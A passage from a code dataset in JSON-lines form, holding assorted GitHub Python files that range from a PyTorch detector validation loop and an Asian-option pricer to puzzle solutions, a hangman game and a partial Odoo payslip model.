'AMTNet_' +\n repr(iteration) + '.pth')\n\n net.eval() # switch net to evaluation mode\n with torch.no_grad():\n mAP, ap_all, ap_strs = validate(args, net, priors, val_data_loader, val_dataset, iteration, iou_thresh=args.iou_thresh)\n\n for ap_str in ap_strs:\n print(ap_str)\n log_file.write(ap_str+'\\n')\n ptr_str = '\\nMEANAP:::=>'+str(mAP)+'\\n'\n print(ptr_str)\n log_file.write(ptr_str)\n\n if args.visdom:\n aps = [mAP]\n for ap in ap_all:\n aps.append(ap)\n viz.line(\n X=torch.ones((1, args.num_classes)).cpu() * iteration,\n Y=torch.from_numpy(np.asarray(aps)).unsqueeze(0).cpu(),\n win=val_lot,\n update='append'\n )\n net.train() # Switch net back to training mode\n torch.cuda.synchronize()\n t0 = time.perf_counter()\n prt_str = '\\nValidation TIME::: {:0.3f}\\n\\n'.format(t0-tvs)\n print(prt_str)\n log_file.write(ptr_str)\n\n log_file.close()\n\n\ndef validate(args, net, priors, val_data_loader, val_dataset, iteration_num, iou_thresh=0.5):\n \"\"\"Test a SSD network on an image database.\"\"\"\n print('Validating at ', iteration_num)\n num_images = len(val_dataset)\n num_classes = args.num_classes\n priors = priors.cuda()\n det_boxes = [[] for _ in range(len(CLASSES[args.dataset]))]\n gt_boxes = []\n print_time = True\n batch_iterator = None\n val_step = 100\n count = 0\n torch.cuda.synchronize()\n ts = time.perf_counter()\n softmax = nn.Softmax(dim=2).cuda()\n with torch.no_grad():\n for 
val_itr in range(len(val_data_loader)):\n if not batch_iterator:\n batch_iterator = iter(val_data_loader)\n\n torch.cuda.synchronize()\n t1 = time.perf_counter()\n\n images, ground_truths, _ , _, num_mt, img_indexs = next(batch_iterator)\n batch_size = images[0].size(0)\n #images = images.permute(1, 0, 2, 3, 4)\n height, width = images[0].size(3), images[0].size(4)\n\n images = [img.cuda(0, non_blocking=True) for img in images if not isinstance(img, list)]\n\n conf_preds, loc_data = net(images)\n \n # pdb.set_trace()\n conf_scores_all = softmax(conf_preds).clone()\n \n\n if print_time and val_itr%val_step == 0:\n torch.cuda.synchronize()\n tf = time.perf_counter()\n print('Forward Time {:0.3f}'.format(tf-t1))\n \n for b in range(batch_size):\n # pdb.set_trace()\n inds = np.asarray([m*args.seq_len for m in range(num_mt[b])])\n # pdb.set_trace()\n gt = ground_truths[b].numpy()\n gt = gt[inds]\n gt[:,0] *= width\n gt[:,2] *= width\n gt[:,1] *= height\n gt[:,3] *= height\n gt_boxes.append(gt)\n decoded_boxes = decode_seq(loc_data[b], priors, args.cfg['variance'], args.seq_len)\n decoded_boxes = decoded_boxes[:,:4].clone()\n conf_scores = conf_scores_all[b].clone()\n #Apply nms per class and obtain the results\n for cl_ind in range(1, num_classes):\n # pdb.set_trace()\n scores = conf_scores[:, cl_ind].squeeze()\n c_mask = scores.gt(args.conf_thresh) # greater than minmum threshold\n scores = scores[c_mask].squeeze() # reduce the dimension so if no element then # of dim is 0\n if scores.dim() == 0:\n det_boxes[cl_ind - 1].append(np.asarray([]))\n continue\n boxes = decoded_boxes.clone()\n l_mask = c_mask.unsqueeze(1).expand_as(boxes)\n boxes = boxes[l_mask].view(-1, 4)\n # idx of highest scoring and non-overlapping boxes per class\n ids, counts = nms(boxes, scores, args.nms_thresh, args.topk) # idsn - ids after nms\n scores = scores[ids[:counts]].cpu().numpy()\n boxes = boxes[ids[:counts]].cpu().numpy()\n # print('boxes sahpe',boxes.shape)\n boxes[:,0] *= width\n boxes[:,2] *= width\n boxes[:,1] *= height\n boxes[:,3] *= height\n\n for ik in range(boxes.shape[0]):\n boxes[ik, 0] = max(0, boxes[ik, 0])\n boxes[ik, 2] = min(width, boxes[ik, 2])\n boxes[ik, 1] = max(0, boxes[ik, 1])\n boxes[ik, 3] = min(height, boxes[ik, 3])\n cls_dets = np.hstack((boxes, scores[:, np.newaxis])).astype(np.float32, copy=True)\n det_boxes[cl_ind-1].append(cls_dets)\n count += 1\n\n if val_itr%val_step == 0:\n torch.cuda.synchronize()\n te = time.perf_counter()\n print('im_detect: {:d}/{:d} time taken {:0.3f}'.format(count, num_images, te-ts))\n torch.cuda.synchronize()\n ts = time.perf_counter()\n if print_time and val_itr%val_step == 0:\n torch.cuda.synchronize()\n te = time.perf_counter()\n print('NMS stuff Time {:0.3f}'.format(te - tf))\n print('Evaluating detections for itration number ', iteration_num)\n return evaluate_detections(gt_boxes, det_boxes, CLASSES[args.dataset], iou_thresh=iou_thresh)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gurkirt/AMTNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":21949,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"35577905924","text":"\"\"\"\nImplement closed-form formulas for geometric Asian call/put options.\n# @Author: Zhang Weibin\n\"\"\"\nimport math\nfrom math import e\nfrom scipy.stats import norm\n\nclass GeoAsianOption():\n \n def __init__(self, S, sigma, r, T, K, n):\n \n # the Spot Price of Asset S(0)\n self.S = S\n # the Implied Volatility\n self.sigma 
= sigma\n # the Risk-free Interest Rate\n self.r = r\n # Time to Maturity (in year)\n self.T = T\n # the Strike\n self.K = K\n # the number of observation times for the geometric average\n self.n = n\n \n # for call option\n def CallGeoAsian(self):\n \n S, sigma, r, T, K, n = self.S, self.sigma, self.r, self.T, self.K, self.n\n \n sigma_hat = sigma*math.sqrt(((n + 1)*(2*n + 1))/(6*n**2))\n mu = (r - (1/2)*sigma**2)*((n+1)/(2*n))+(1/2)*sigma_hat**2\n \n # d1 = [ln(S/K) + (mu + sigma_hat^2/2)*T] / (sigma_hat*sqrt(T)); T multiplies the drift term only\n d1 = (math.log(S/K) + (mu + (1/2)*sigma_hat**2)*T)/(sigma_hat*math.sqrt(T))\n d2 = d1 - sigma_hat*math.sqrt(T)\n \n N_d1_P = norm.cdf(d1)\n N_d2_P = norm.cdf(d2)\n\n # the closed-form formula for the geometric Asian call option\n Call = e**(-(r*T))*(S*e**(mu*T)*N_d1_P - K*N_d2_P)\n \n return Call\n\n # for put option\n def PutGeoAsian(self):\n \n S, sigma, r, T, K, n = self.S, self.sigma, self.r, self.T, self.K, self.n\n \n sigma_hat = sigma*math.sqrt(((n + 1)*(2*n + 1))/(6*n**2))\n mu = (r - (1/2)*sigma**2)*((n+1)/(2*n))+(1/2)*sigma_hat**2\n \n d1 = (math.log(S/K) + (mu + (1/2)*sigma_hat**2)*T)/(sigma_hat*math.sqrt(T))\n d2 = d1 - sigma_hat*math.sqrt(T)\n \n N_d1_N = norm.cdf(-d1)\n N_d2_N = norm.cdf(-d2)\n \n # the closed-form formula for the geometric Asian put option\n Put = e**(-(r*T))*(K*N_d2_N - S*e**(mu*T)*N_d1_N)\n \n return Put\n ","repo_name":"bjwu/option_pricing","sub_path":"CFGeoAsianOption.py","file_name":"CFGeoAsianOption.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"}
{"seq_id":"71225585071","text":"from sciapp.action import Table\nimport pandas as pd\n\nclass Statistic(Table):\n\ttitle = 'Table Statistic'\n\tnote = ['auto_snap', 'num_only', 'auto_msk']\n\n\tpara = {'axis':'Column', 'sum':True, 'mean':True,'max':False, \n\t\t'min':False,'var':False,'std':False,'skew':False,'kurt':False}\n\t\t\n\tview = [(list, 'axis', ['Row', 'Column'], str, 'axis', ''),\n\t\t\t(bool, 'sum', 'sum'),\n\t\t\t(bool, 'mean', 'mean'),\n\t\t\t(bool, 'max', 'max'),\n\t\t\t(bool, 'min', 'min'),\n\t\t\t(bool, 'var', 'var'),\n\t\t\t(bool, 'std', 'std'),\n\t\t\t(bool, 'skew', 'skew'),\n\t\t\t(bool, 'kurt', 'kurt')]\n\n\tdef run(self, tps, snap, data, para=None):\n\t\trst, axis = {}, (0,1)[para['axis']=='Row']\n\t\tif para['sum']:rst['sum'] = snap.sum(axis=axis)\n\t\tif para['mean']:rst['mean'] = snap.mean(axis=axis)\n\t\tif para['max']:rst['max'] = snap.max(axis=axis)\n\t\tif para['min']:rst['min'] = snap.min(axis=axis)\n\t\tif para['var']:rst['var'] = snap.var(axis=axis)\n\t\tif para['std']:rst['std'] = snap.std(axis=axis)\n\t\tif para['skew']:rst['skew'] = snap.skew(axis=axis)\n\t\tif para['kurt']:rst['kurt'] = snap.kurt(axis=axis)\n\t\tcols = ['sum', 'mean', 'min', 'max', 'var', 'std', 'skew', 'kurt']\n\t\tcols = [i for i in cols if i in rst]\n\t\tself.app.show_table(pd.DataFrame(rst, columns=cols).T, tps.title+'-statistic')\n\nclass GroupStatistic(Table):\n\ttitle = 'Group Statistic'\n\n\tpara = {'major':None, 'minor':None, 'sum':True, 'mean':True,'max':False, \n\t\t'min':False,'var':False,'std':False,'skew':False,'kurt':False, 'cn':[]}\n\t\t\n\tview = [('fields', 'cn', 'field to statistic'),\n\t\t\t('field', 'major', 'group by', 'major'),\n\t\t\t('field', 'minor', 'group by', 'minor'),\n\t\t\t\n\t\t\t(bool, 'sum', 'sum'),\n\t\t\t(bool, 'mean', 'mean'),\n\t\t\t(bool, 'max', 'max'),\n\t\t\t(bool, 'min', 'min'),\n\t\t\t(bool, 'var', 'var'),\n\t\t\t(bool, 'std', 'std'),\n\t\t\t(bool, 'skew', 'skew')]\n\n\tdef run(self, tps, 
snap, data, para=None):\n\t\tby = [i for i in [para['major'], para['minor']] if i!='None']\n\t\tgp = data.groupby(by)[para['cn']]\n\n\t\trst = []\n\t\tdef post(a, fix):\n\t\t\ta.columns = ['%s-%s'%(i,fix) for i in a.columns]\n\t\t\treturn a\n\n\t\tif para['sum']:rst.append(post(gp.sum(), 'sum'))\n\t\tif para['mean']:rst.append(post(gp.mean(), 'mean'))\n\t\tif para['max']:rst.append(post(gp.max(), 'max'))\n\t\tif para['min']:rst.append(post(gp.min(), 'min'))\n\t\tif para['var']:rst.append(post(gp.var(), 'var'))\n\t\tif para['std']:rst.append(post(gp.std(), 'std'))\n\t\tif para['skew']:rst.append(post(gp.skew(), 'skew'))\n\n\t\tself.app.show_table(pd.concat(rst, axis=1), tps.title+'-statistic')\n\nplgs = [Statistic, GroupStatistic]","repo_name":"Image-Py/imagepy","sub_path":"imagepy/menus/Table/Statistic/statistic_plgs.py","file_name":"statistic_plgs.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":1265,"dataset":"github-code","pt":"38"}
{"seq_id":"26184027735","text":"def threeName(N):\n single_digits = ['One','Two','Three','Four','Five','Six','Seven','Eight','Nine','Ten']\n # only handles strings of one or two digits; longer strings are returned unchanged\n if len(N) < 3:\n if len(N) < 2:\n return single_digits[int(N)-1]\n return N\n\ndef euler017(N):\n def tryThree(a):\n single_digits = ['','One','Two','Three','Four','Five','Six','Seven','Eight','Nine','Ten']\n double_digits = ['','Eleven','Twelve','Thirteen','Fourteen','Fifteen','Sixteen','Seventeen','Eighteen','Nineteen','Twenty']\n tens_digits = ['','Ten','Twenty','Thirty','Forty','Fifty','Sixty','Seventy','Eighty','Ninety','One Hundred']\n\n special = False\n # if int(a[:-1]) == 0:\n # pass\n # # Now we need at \n\n\n out_number = ''\n t = list(map(lambda x: int(x) , list(a)))\n if int(a)==0:\n return ''\n if int(a)<10:\n return single_digits[t[0]]\n if int(a)==10:\n return single_digits[-1]\n if int(a)<20:\n return double_digits[t[-1]]\n \n if int(a)>99:\n # we have a three digit number\n out_number += single_digits[t[0]]+' Hundred'\n\n if int(a)%100>20:\n # number \n out_number += tens_digits[t[-2]]+' '\n out_number += single_digits[t[-1]]\n return out_number\n elif int(a)%100 >10:\n out_number += double_digits[t[2]]\n return out_number\n\n return out_number\n try:\n return single_digits[t[0]]+double_digits[t[1]]+single_digits[t[2]]\n except IndexError:\n try:\n return single_digits[t[0]]+single_digits[t[1]]\n except IndexError:\n return single_digits[t[0]]\n return a\n\n\n num_places = len(str(N))\n sN = str(N)\n places = ['','Trillion','Billion','Million','Thousand','']\n np = range(0,num_places,3)\n\n\n out_word = ''\n\n for i in range(1,num_places+1,3):\n\n \n if num_places-i>3:\n if int(sN[-i-2:][:3])==0:\n continue\n # print(tryThree(sN[-i-2:][:3]),-int(i/3))\n out_word= tryThree(sN[-i-2:][:3]) +' '+ places[-int(i/3)]+out_word\n else:\n # print(sN[-i-2:][:num_places-i+1])\n # print(tryThree(sN[-i-2:][:num_places-i+1]))\n if(int(sN[-i-2:][:num_places-i+1]))==0:\n continue\n out_word = tryThree(sN[-i-2:][:num_places-i+1])+' '+places[-int(i/3)-1]+' '+out_word\n return out_word\n\n # 9 zeros is 1 billion\n # 6 zeros is 1 million\n # 3 zeros is 1 thousand\n\n\n# print(euler017('4000'))\nprint(euler017('100100'))\n\n\n","repo_name":"jawjay/projectEuler","sub_path":"euler017.py","file_name":"euler017.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
{"seq_id":"26619915408","text":"def Hangman (name):\n import random\n import string\n from random_word 
import RandomWords\n import logging\n from random import choice\n Separated_string = []\n Good_guess = []\n x = '_'\n counter_wins = 0\n counter_los = 0\n print(\"Welcome to Hangman Game\")\n letters = RandomWords()\n The_word = letters.get_random_word()\n number_of_guesses = len(The_word)\n for i in range(number_of_guesses):\n Good_guess.append('_')\n for i in range(number_of_guesses):\n Separated_string.append(The_word[:1])\n The_word = The_word[1:]\n for i in range(number_of_guesses):\n User_guess = input(\"Enter the selection of the letter you selected:\\n\")\n if x not in Good_guess:\n return 1\n if User_guess in Separated_string:\n for j in range (len(Separated_string)):\n if Separated_string[j] == User_guess:\n Good_guess[j] = Separated_string[j]\n counter_wins += 1\n number_of_guesses -= 1\n print(\"Very good,but you have more:\", number_of_guesses , \"guesses\")\n print(Good_guess)\n else:\n counter_los += 1\n number_of_guesses -= 1\n print(\"Sorry, wrong guess…you have more\", number_of_guesses, \"guesses\")\n print(Good_guess)\n\n if x in Good_guess:\n return 0\n else:\n return 1\n\n","repo_name":"Eilonasraf/Basis_Project","sub_path":"H_man.py","file_name":"H_man.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1482091299","text":"#!/usr/bin/env python\n\"\"\"\nQuery MediaWiki API for plain text of article\n\nReferences\n https://en.wikipedia.org/wiki/Parse_tree\n https://www.mediawiki.org/wiki/API:Main_page\n https://www.mediawiki.org/wiki/User:Kephir/XML_parse_tree\n\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nimport os\n\nimport sys\nimport time\nimport wptools\n\n\ndef main(title, compact, lead, test, verbose, wiki):\n start = time.time()\n data = wptools.get_html(title, lead, test, wiki, verbose)\n if test:\n print(data)\n sys.exit(os.EX_OK)\n print(wptools.text(data, lead, compact))\n if verbose:\n print(\"%5.3f seconds\" % (time.time() - start), file=sys.stderr)\n\n\nif __name__ == \"__main__\":\n desc = \"Query MediaWiki API for plain text of article\"\n argp = argparse.ArgumentParser(description=desc)\n argp.add_argument(\"title\", help=\"article title\")\n argp.add_argument(\"-c\", \"-compact\", action='store_true',\n help=\"collapse newlines\")\n argp.add_argument(\"-l\", \"-lead\", action='store_true',\n help=\"only lead section\")\n argp.add_argument(\"-t\", \"-test\", action='store_true',\n help=\"show query and exit\")\n argp.add_argument(\"-v\", \"-verbose\", action='store_true',\n help=\"HTTP status to stdout\")\n argp.add_argument(\"-w\", \"-wiki\",\n default=wptools.WPToolsFetch.ENDPOINT,\n help=\"wiki (%s)\" % wptools.WPToolsFetch.ENDPOINT)\n args = argp.parse_args()\n\n main(args.title, args.c, args.l, args.t, args.v, args.w)\n","repo_name":"akessner/monfort_wiki","sub_path":"libs/wptools_master/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70664512751","text":"from typing import Optional\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n\n max_sum = float('-inf')\n\n def maxPathSum(self, root: Optional[TreeNode]) -> int:\n \n self.max_sum_rec(root)\n \n return self.max_sum\n\n def max_sum_rec(self, node: Optional[TreeNode]) -> int:\n \n if not node:\n return 
0\n\n maxLeft = self.max_sum_rec(node.left)\n maxRight = self.max_sum_rec(node.right)\n\n fullSum = node.val + maxLeft + maxRight\n leftSum = node.val + maxLeft\n rightSum = node.val + maxRight\n \n max_sum_local = max(fullSum, leftSum, rightSum, node.val)\n\n if max_sum_local > self.max_sum:\n self.max_sum = max_sum_local\n\n return max(leftSum, rightSum, node.val)\n","repo_name":"yang-zhang-syd/python-practice","sub_path":"124.BinaryTreeMaximumPathSum.py","file_name":"124.BinaryTreeMaximumPathSum.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
{"seq_id":"27564151228","text":"#Question 1\r\n\r\n\r\n\r\nclass Cell:\r\n\r\n int_x = 0\r\n int_y = 0\r\n status= 0\r\n grid=[]\r\n def __init__(self,world,x,y,status,edge_len):\r\n self.world=world #Question 5\r\n self.edge_len=edge_len\r\n self.x = x\r\n self.y = y\r\n self.status = status\r\n counter=0\r\n def neighbours(self, x, y): #Question 6\r\n\r\n count = 0\r\n\r\n for index in [-1, 0, 1]:\r\n for ver in [-1, 0, 1]:\r\n if not index == ver == 0 and (self.grid == True or (0 <= x + index < self.edge_len and 0 <= y + ver < self.edge_len)):\r\n count += self.grid[(y + ver) % self.edge_len][(x + index) % self.edge_len]\r\n\r\n return count\r\n\r\n \r\n def birth(self):\r\n self.status = True\r\n def alive(self):\r\n self.status = False\r\n\r\n \r\n#Question 3\r\n \r\nclass World:\r\n edge_len = 0\r\n num_cell = 0\r\n num_alive_cells = 0\r\n time=0\r\n grid=[]\r\n def __init__(self,world,edge_len):\r\n self.world=world #Question 5\r\n self.edge_len = edge_len\r\n self.num_cell = edge_len*edge_len\r\n self.grid= list(range(self.num_cell)) #Question 2\r\n for index in range(self.num_cell):\r\n self.grid[index] = Cell(self, index % self.edge_len, index // self.edge_len, 0, self.edge_len)\r\n\r\n def is_cell_alive(self,cord_x,cord_y):\r\n if cord_x<0 or cord_x>=self.edge_len or cord_y<0 or cord_y>=self.edge_len: #Question 4\r\n return False\r\n else:\r\n return self.grid[cord_y*self.edge_len+cord_x].status\r\n \r\n \r\n \r\n","repo_name":"Nxumalo/System-Program","sub_path":"Prac13.py","file_name":"Prac13.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
{"seq_id":"11583571224","text":"# [Bishop]\n# Problem 1799\nimport sys\nn = int(sys.stdin.readline().rstrip())\ngraph = []\nfor _ in range(n):\n graph.append(list(map(int,sys.stdin.readline().split())))\n\nwhite = []\nblack = []\nfor i in range(n):\n for j in range(n):\n if graph[i][j] == 1:\n if (i % 2 == 0 and j % 2 == 0) or (i % 2 != 0 and j % 2 != 0):\n black.append((i, j))\n else:\n white.append((i, j))\n\ndef DFS(bishop, idx, count):\n global resultB, resultW\n if idx == len(bishop):\n x, y = bishop[idx-1]\n if (x % 2 == 0 and y % 2 == 0) or (x % 2 != 0 and y % 2 != 0):\n resultB = max(resultB, count)\n else:\n resultW = max(resultW, count)\n return\n x, y = bishop[idx]\n if stripe_01[x+y] == True or stripe_02[x-y+n-1] == True:\n DFS(bishop, idx+1, count)\n else:\n stripe_01[x+y] = True\n stripe_02[x-y+n-1] = True\n DFS(bishop, idx+1, count + 1)\n stripe_01[x+y] = False\n stripe_02[x-y+n-1] = False\n DFS(bishop, idx+1, count)\n \nresultW = 0\nresultB = 0\nstripe_01 = [False] * (n*2-1)\nstripe_02 = [False] * (n*2-1)\nif len(white) > 0:\n DFS(white, 0, 0)\nif len(black) > 0:\n DFS(black, 0, 0)\nprint(resultW + 
resultB)\n","repo_name":"JungChangwoo/Algorithm_PS","sub_path":"Baekjoon/BFSDFS/Bishop.py","file_name":"Bishop.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
{"seq_id":"72456912752","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('bookrepos', '0007_bookrepo_cover_url'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='bookrepo',\n name='created_at',\n field=models.DateTimeField(default=django.utils.timezone.now, auto_now_add=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"gitenberg-dev/giten_site","sub_path":"gitensite/apps/bookrepos/migrations/0008_auto_20150508_0015.py","file_name":"0008_auto_20150508_0015.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"38"}
{"seq_id":"1025329362","text":"class Solution:\n def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:\n boxTypes = sorted(boxTypes,key=lambda x: x[1],reverse = True)\n maxUnits = 0\n for boxType in boxTypes:\n if truckSize > 0:\n if boxType[0] < truckSize:\n maxUnits += boxType[0]*boxType[1]\n truckSize -= boxType[0]\n else:\n maxUnits += truckSize*boxType[1]\n truckSize = 0\n else:\n break\n return maxUnits\n \n ","repo_name":"abrahamshimekt/Competitive-Programming-Problem-Solutions","sub_path":"1710-maximum-units-on-a-truck/1710-maximum-units-on-a-truck.py","file_name":"1710-maximum-units-on-a-truck.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"}
{"seq_id":"560056202","text":"from abc import ABC, abstractmethod\nimport numpy as np\nfrom PIL import ImageGrab\nimport cv2\nimport settings\nfrom src.ui_automation_tools import mouse_events_monitoring\nfrom src.ui_automation_tools import keyboard_events_monitoring\nfrom src.utils import time_tools\nimport datetime\n\n\nclass ABCScreenCaster(ABC):\n\t\n\t@abstractmethod\n\tdef __init__(self, keyboard_keys_2_monitor_list):\n\t\tself.keyboard_keys_2_monitor_list = keyboard_keys_2_monitor_list\n\t\tself.paused = False\n\t\tself.current_mouse_states = None\n\t\tself.current_keyboard_states = None\n\t\tself.grid_handler = None\n\t\tself.data_storage_dir = None\n\t\t# super().__init__()\n\t\n\t@abstractmethod\n\tdef p_keyboard_key_action(self):\n\t\tif self.paused is False:\n\t\t\tprint(\"Pausing...\")\n\t\t\tself.paused = True\n\t\t\tprint(\"Paused!\")\n\t\telif self.paused is True:\n\t\t\tprint(\"Unpausing...\")\n\t\t\tself.paused = False\n\t\t\tprint(\"Unpaused!\")\n\t\t\t\n\t@abstractmethod\n\tdef t_keyboard_key_action(self):\n\t\tcv2.destroyAllWindows()\n\t\t\n\t\t\n\t@abstractmethod\n\tdef lmc_action(self):\n\t\traise NotImplementedError\n\n\n\t@abstractmethod\n\tdef set_current_mouse_states(self, mouse_states):\n\t\tself.current_mouse_states = mouse_states\n\n\t@abstractmethod\n\tdef set_current_keyboard_states(self, keyboard_states):\n\t\tself.current_keyboard_states = keyboard_states\n\n\t@abstractmethod\n\tdef set_data_storage_dir(self):\n\t\tpass\n\n\t@abstractmethod\n\tdef set_handler(self):\n\t\tpass\n\n\n\n\t@abstractmethod\n\tdef pre_screen_casting_setup(self):\n\t\tself.set_handler()\n\t\tself.set_data_storage_dir()\n\t\ttime_tools.delay_timer(3)\n\t\t# Get the current states of 
the mouse buttons and keyboard keys and set them as the very 1st init\n\t\t# mouse & keyboard states\n\t\tinit_mouse_states = mouse_events_monitoring.get_init_mouse_states(settings.mouse_nVirtKey_dict)\n\t\tinit_keyboard_states = keyboard_events_monitoring.get_init_keyboard_states(settings.keyboard_nVirtKey_dict)\n\t\tself.set_current_mouse_states(init_mouse_states)\n\t\tself.set_current_keyboard_states(init_keyboard_states)\n\n\n\n\n\t@abstractmethod\n\tdef start_screen_casting(self, roi):\n\n\t\tself.pre_screen_casting_setup()\n\n\t\twhile True:\n\t\t\tcurrent_datetime = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n\t\t\tprintscreen = np.array(ImageGrab.grab(bbox=roi))\n\t\t\trgb_img = cv2.cvtColor(printscreen, cv2.COLOR_BGR2RGB)\n\t\t\timg_wndw_name = 'Game Client Sreen Cast of region {0}'.format(roi)\n\t\t\tcv2.namedWindow(img_wndw_name, cv2.WINDOW_NORMAL)\n\t\t\tcv2.imshow(img_wndw_name, rgb_img)\n\t\n\n","repo_name":"xaviergoby/RSAI_JARVIS","sub_path":"research_and_dev/end2end_nav/screen_casters/abc_screen_caster_class.py","file_name":"abc_screen_caster_class.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18490982976","text":"from database.mongodb_validators import validate_object_id\nfrom fastapi import HTTPException\nfrom database.mongodb import db\n\n\ndef fix_telegram_id(telegram):\n if telegram.get(\"_id\", False):\n # change ObjectID to string\n telegram[\"_id\"] = str(telegram[\"_id\"])\n return telegram\n else:\n raise ValueError(\n f\"No `_id` found! Unable to fix telegram ID for telegram: {telegram}\"\n )\n\n# Get telegram Function.\n\n\nasync def _get_telegram_or_404(id: str):\n _id = validate_object_id(id)\n telegram = await db.Telegram.find_one({\"_id\": _id})\n if telegram:\n return fix_telegram_id(telegram)\n else:\n raise HTTPException(status_code=404, detail=\"telegram not found\")\n","repo_name":"LayNath242/fast-telegram","sub_path":"utils/get_telegram.py","file_name":"get_telegram.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72393418990","text":"class Tournament:\n\n def __init__(self, specifications) -> None:\n if '_id' in specifications:\n self._id = specifications['_id']\n self._name = specifications['_name']\n self._place = specifications['_place']\n self._date_start = specifications['_date_start']\n self._date_end = specifications['_date_end']\n if '_id_stage' in specifications:\n self._id_stage = specifications['_id_stage']\n self._time_control = specifications['_time_control']\n self._description = specifications['_description']\n self._number_players = specifications['_number_players']\n if '_list_players' in specifications:\n self._list_players = specifications['_list_players']\n if '_status' in specifications:\n self._status = specifications['_status']\n else:\n self._status = 0\n if '_stage_in_progress' in specifications:\n self._stage_in_progress = specifications['_stage_in_progress']\n else:\n self._stage_in_progress = 0\n","repo_name":"AlxandrV/Chest-manager","sub_path":"model/tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71745085552","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError, UserError\nfrom odoo.tools 
import float_compare, float_is_zero\n\n\nWORK_DAY_PER_MONTH = 30\n\nclass HrPayslipInput(models.Model):\n _inherit = 'hr.payslip.input'\n\n description = fields.Text('Description')\n\n\nclass HrPayslipLine(models.Model):\n _inherit = 'hr.payslip.line'\n\n def _get_partner_id(self, credit_account):\n \"\"\"\n overridden because every employee has a partner\n \"\"\"\n return self.employee_id.partner_id.id or False\n\n\nclass HrPayslip(models.Model):\n _name = 'hr.payslip'\n _inherit = ['hr.payslip', 'mail.thread']\n journal_id = fields.Many2one('account.journal', 'Salary Journal', readonly=True, required=True,\n states={'draft': [('readonly', False)]},\n default=lambda self: self.env['account.journal'].search([('code', '=', 'SALRY')],\n limit=1),\n domain=[('code', '=', 'SALRY')])\n job_id = fields.Many2one('hr.job', string=\"Job Position\")\n branch_id = fields.Many2one('bsg_branches.bsg_branches', string=\"Branch\")\n department_id = fields.Many2one('hr.department', string=\"Department\")\n salary_payment_method = fields.Selection([('bank', 'Bank'), ('cash', 'Cash')], string=\"Salary Payment Method\")\n # employee_state = fields.Selection([\n # ('on_job', 'On Job'),\n # ('on_leave', 'On leave'),\n # ('return_from_holiday', 'Return From Holiday'),\n # ('resignation', 'Resignation'),\n # ('suspended', 'Suspended'),\n # ('service_expired', 'Service Expired'),\n # ('ending_contract_during_trial_period', 'Ending Contract During Trial Period')], string='Employee State')\n employee_state = fields.Selection([\n ('on_job', 'On Job'),\n ('on_leave', 'On leave'),\n ('return_from_holiday', 'Return From Holiday'),\n ('resignation', 'Resignation'),\n ('suspended', 'Suspended'),\n ('service_expired','Service Expired'),\n ('contract_terminated', 'Contract Terminated'),\n ('ending_contract_during_trial_period','Ending Contract During Trial Period'),\n ('deceased', 'Deceased'),\n ('suspended_case', 'Suspended for Case'),\n\n ], string='Employee State')\n category_ids = fields.Many2many(\n 'hr.employee.category',\n string='Tags')\n category_id = fields.Many2one(\n 'hr.employee.category',\n string='Tag')\n state = fields.Selection([\n ('draft', 'Draft'),\n ('verify', 'Waiting'),\n ('done', 'Done'),\n ('paid', 'Paid'),\n ('cancel', 'Rejected'),\n ], string='Status', index=True, readonly=True, copy=False, default='draft',\n help=\"\"\"* When the payslip is created the status is \\'Draft\\'\n \\n* If the payslip is under verification, the status is \\'Waiting\\'.\n \\n* If the payslip is confirmed then status is set to \\'Done\\'.\n \\n* If the payslip is paid then status is set to \\'Paid\\'.\n \\n* When user cancel payslip the status is \\'Rejected\\'.\"\"\", track_visibility='onchange')\n\n total_net = fields.Float('Total Net', compute=\"_compute_total_net\", readonly=True, store=True)\n payment_move_id = fields.Many2one('account.move', string=\"Payment Entry\", readonly=True)\n description = fields.Text('Description', readonly=True, states={'draft': [('readonly', False)]})\n pay_by_branch = fields.Boolean(string=\"Pay By Branch\")\n pay_by_branch_check = fields.Boolean(string=\"Pay By Branch Check\", 